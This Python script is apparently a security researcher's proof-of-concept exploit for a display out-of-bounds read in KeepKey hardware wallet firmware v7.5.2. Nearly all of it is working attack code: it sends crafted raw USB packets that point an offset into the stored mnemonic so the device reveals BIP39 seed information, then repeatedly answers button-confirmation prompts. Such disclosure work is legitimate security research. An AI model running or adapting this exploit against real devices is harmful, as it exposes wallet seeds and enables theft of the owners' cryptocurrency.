#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
KeepKey Display Out-of-bounds Read POC No.2

Affected firmware versions
* v7.5.2 confirmed
* v7.6.0 untested, requires memory address adjustments

Preconditions:
* fully initialized device
* unlocked PIN state
The preconditions are reached by default on startup on a KeepKey without PIN.

Required user interaction during the exploit:
1. press button to confirm the contract address
2. press button to confirm the contract func exec_tx screen no. 1
3. press button to confirm the contract func exec_tx screen no. 2

Expected result:
Reveal BIP39 seed information on affected KeepKey firmware versions.
"""

__author__ = "Christian Reitter"

# Preparation: 
# ensure pyusb is installed through `pip3 install pyusb`
import usb.core
import time
import sys
import subprocess

# ID 2b24:0002 KeepKey LLC
dev = usb.core.find(idVendor=0x2b24, idProduct=0x0002)

endpointOut = 0x01
endpointIn = 0x81

if not dev:
    print("unable to find a KeepKey device, exiting ..")
    sys.exit(1)

print("found KeepKey device, launching POC")

def zero_pad_64_bytes(input):
    return input + b'\x00' * (64 -len(input))

# send offset 0xFFFF0AAA to target readout two bytes into shadow_config.storage.sec.mnemonic
# the initial 2 bytes of mnemonic data are (mis-)used as a sufficiently large dlen field
message_offset_value = b'\xff\xff\x0a\xaa'

dev.write(endpointOut, b'?##\x00:\x00\x00\x01#\x08\xac\x80\x80\x80\x08\x08\xbc\x80\x80\x80\x08\x08\x80\x80\x80\x80\x08\x08\x00\x08\x00\x12\x01\x01\x1a\x01\x14"\x01\x14*\x14\xac\xd0\r\x9a\xc4f\xcf\xbb\x14\xfd\x94y\x8ds\xd9\xbbK\xc4F\xa46\x00');
dev.write(endpointOut, b'?:\xe4\x01jv\x12\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x0c,\xfci\xe6\x8a[\x8d^+\x9e+\x9c\xc33,\xaf\xf7{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00');
dev.write(endpointOut, b'?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + message_offset_value + b'y 7\xe3\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00D\x8aPe\xae\xbb\xfb');
dev.write(endpointOut, b'?\x00\x00\x00\x00\x00\x00\x00\x04\x9eW\xd65@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xe4\x01`\x01\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x1c\x1c\x1c\x1e\x14');
dev.write(endpointOut, b'?\x00\x00\x00\x00\x00\x00\x00\x04\x9eW\xd65@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xe4\x01`\x01\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x1c\x1c\x1c\x1e\x14');

# read and discard device responses
for x in range(100):
    try:
        dev.read(endpointIn, 64, 1)
    except:
        pass

# repeat button confirmation logic for some rounds to allow variable time for
# human interaction with the target device
print("keep pressing the KeepKey confirmation button on subsequent dialogs")
for i in range(1000):
    try:
        # respond to button request to unlock physical button confirm
        # send button request reply
        # 0040   3f 23 23 00 1b 00 00 00 00 00 00 00 00 00 00 00
        # [...]
        dev.write(endpointOut, zero_pad_64_bytes( b'?##\x00\x1b'))
    except:
        pass

    time.sleep(0.1)


    # read remaining packets (if present) to clear queue
    for x in range(10):
        try:
            dev.read(endpointIn, 64, 1)
        except:
            pass
try:
    dev.reset()
except:
    pass

print("finished POC")
